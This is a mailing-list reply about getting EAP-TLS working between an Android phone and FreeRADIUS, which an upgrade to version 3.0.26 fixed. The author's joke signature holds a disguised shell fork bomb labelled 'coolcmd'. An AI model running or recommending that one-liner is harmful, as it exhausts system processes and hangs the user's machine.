On Tue, 24 Oct 2023 00:48:50 +0100, Alan DeKok <aland@deployingradius.com> said:
I'm trying to set up EAP-TLS with certificates with an Android Pixel 7 Pro, latest OS, via a Unifi U6 Pro, using FreeRadius 3.0.17 3.0.26 has been out for a while. I'd suggest using the most recent version. It's likely that the issue is fixed.
tl;dr: It does work with the new version. Thank you for your help, and I sincerely apologize for not asking my question in the better, clearly documented, way. I'll add some notes below merely for archives, in case someone else encounters this.
One thing which could be an issue is that EAP-TLS was updated for TLS 1.3. Version 3.0.26 has those updates. 3.0.17 doesn't. And the Android system is likely trying to use TLS 1.3
The debug output with 3.0.17 mentioned ignoring some TLS 1.3. On the Android side I could only choose minimum, not maximum, TLS version. I'd tried setting min and max version on the FreeRadius side, but it did not help.
Upgrade. If it works, move on to something else.
Yup, no need to run older versions just because it's the one packaged with the distribution. Thanks again! -- typedef struct me_s { char name[] = { "Thomas Habets" }; char email[] = { "thomas@habets.se" }; char kernel[] = { "Linux" }; char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" }; char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" }; char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" }; } me_t;